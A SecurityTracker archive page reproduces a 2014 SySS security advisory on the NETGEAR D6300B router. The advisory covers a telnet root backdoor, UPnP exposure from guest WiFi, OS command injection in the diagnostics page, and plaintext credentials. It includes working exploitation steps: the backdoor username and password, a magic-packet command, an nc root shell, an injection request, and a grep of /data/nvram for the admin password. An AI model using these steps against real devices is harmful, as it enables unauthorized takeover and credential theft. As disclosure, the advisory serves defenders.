Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Device (Router/Bridge/Hub)  >   NETGEAR Router Vendors:   NETGEAR
NETGEAR Router D6300B Telnet Backdoor Lets Remote Users Gain Root Access
SecurityTracker Alert ID:  1029727
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 5 2014
Impact:   Root access via network
Exploit Included:  Yes  
Version(s): Model D6300B; Firmware V1.0.0.14_1.0.14
Description:   A vulnerability was reported in NETGEAR Router D6300B. A remote user can gain root access on the target system.

A remote user on the local network or the wireless network can send a specially crafted packet to the telnet service to gain a root shell on the target device.

On systems with a USB drive, a remote user on the guest wireless network can access files on the target drive via UPnP.

A remote authenticated user can exploit a flaw in the web interface to execute arbitrary operating system commands.

The web interface is not secure. Authentication credentials are sent in plaintext via HTTP.

The system stores the web interface authentication credentials in clear text in the '/data/nvram' file.

The vendor was notified on December 12, 2013.

Daniel Sauder, Marcel Mangold, and Pascal Uter reported this vulnerability.

Impact:   A remote user on the local network can gain root access on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error

Message History:   None.

 Source Message Contents

Subject:  Security Advisory: NETGEAR Router D6300B Firmware: V1.0.0.14_1.0.14

Hash: SHA1

Advisory ID: SYSS-2013-001
Product: NETGEAR Router D6300B / Firmware: V1.0.0.14_1.0.14 (latest)
Vendor: Netgear
Affected Version(s): until V1.0.0.14_1.0.14 (latest)
Tested Version(s): V1.0.0.14_1.0.14 (latest)
Vulnerability Type: Root-Shell, OS Command Injection, UPnP misconfiguration
Risk Level: High
Solution Status: None
Vendor Notification: 2013-12-12
Solution Date: None
Public Disclosure: 2014-02-04
CVE Reference: Not assigned
Author of Advisory: Marcel Mangold <>, Pascal Uter <>
Document date: 2014-02-04
Abstract: Root shell telnet backdoor allows an attacker with access to LAN, 
  WiFi, or Guest WiFi to take over the device. Due to a UPnP misconfiguration, 
  shares which should be visible in the internal network only, can be accessed 
  from the Guest WiFi and port forwarding can be activated for the internal 
Credits: Daniel Sauder <>

* Overview:

(1) It is possible to activate a telnet root shell by sending a specifically 
  crafted packet to the telnet service from within the LAN, WiFi, or guest WiFi.
  It is not possible to exploit this vulnerability over the WAN interface.

(2) The router suffers from diverse UPnP related issues. The main problem is 
  UPnP being available from the guest wifi. The router provides file shares 
  (if a USB flash drive is plugged-in) via HTTP, FTP, and UPnP. While the HTTP 
  and FTP shares cannot be accessed from the guest WiFi, it is possible to 
  access the files via UPnP from the guest WiFi. As well port forwarding can be 
  activated out of the guest Wifi which gives an attacker the possibility to 
  reach services only available in the private WiFi out of the guest Wifi.

(3) The web interface is vulnerable to OS Command Injections by authorized users.

(4) The web interface cannot be accessed via HTTPS. The login credentials are 
  submitted as clear text over HTTP.

(5) The web interface login credentials are stored in clear text in the 
  /data/nvram file. This can be exploited in combination with (1) or (3).

* Details concerning (1), (3), (5):
Port 23/TCP (telnet) of the device is open and accessible from within the LAN, 
  WiFi, or guest WiFi. While it is possible to connect to the telnet port, the 
  telnet service does not respond until it receives a specifically crafted 
  packet. This packet is calculated out of the MAC address of the device, a 
  specific constant string, a user name and a password. User name and password 
  are: Gearguy / Geardog. To send the packet, it is possible to use the tool published by Paul Gebheim in 2009:

./ 28C68Exxxxxx Gearguy Geardog

Afterwards, it is possible to connect to a telnet root shell without the need of
  further credentials:

nc 23
BusyBox v1.17.2 (2013-05-02 18:01:36 CST) hush - the humble shell
/ #

Note: It is not possible to use this back door from the WAN interface.

The administrative web interface of the device is vulnerable to OS command 
  injections. For example, it is possible to use the last field of the IP 
  address of the ping tool in the diagnostics page, to append another OS 
  command. The first lines of the command output are returned by the web 

######## REQUEST: #########
POST /diag.cgi?id=991220771 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46cGFzc3dvcmQ=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 95


######## RESPONSE: ########
HTTP/1.0 200 OK
Content-length: 6672
Content-type: text/html; charset="UTF-8"

<textarea name="ping_result" class="num" cols="60" rows="12" wrap="off" readonly>


The web interface login credentials are stored in clear text in the /data/nvram 
 file. This can be exploited in combination with (1), the telnet back door, or 
 (3), the OS command injection in the web interface. Here, the exploitation with
  the telnet back door:

/ # grep http_passwd /data/nvram
grep http_passwd /data/nvram

* Solution:
(1) Wait for a new firmware.

(2) Wait for a new firmware. Disable the guest Wifi or UPnP for partical 

(3) Only give the web interface credentials to people you would also grant root
  access to the device. / Wait for a new firmware.

(4) Wait for a new firmware.

(5) Wait for a new firmware.

* Disclosure timeline:
2013-08-02 - Flaws were discovered in firmware V1.0.0.06
2013-12-12 - Flaws were verified for firmware version V1.0.0.14
2013-12-12 - First contact to vendor
2013-12-20 - Sent this document to vendor
2014-02-04 - Public Disclosure

* GPG:

E-Mail: marcel (dot) mangold (at) syss (dot) de
Public Key:
Key ID: AC15E5BE
Key Fingerprint: E21C 69ED 9A64 7486 6EDD 5E29 4EFE B20B AC15 E5BE

E-Mail: pascal (dot) uter (at) syss (dot) de
Public Key:
Key ID: 351596DF
Key Fingerprint: D269 30F3 F7DD 2C93 95B3 951C 8C89 45B0 3515 96DF

* Copyright:
Creative Commons - Attribution (by) - Version 3.0
Version: GnuPG v1.4.11 (GNU/Linux)


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC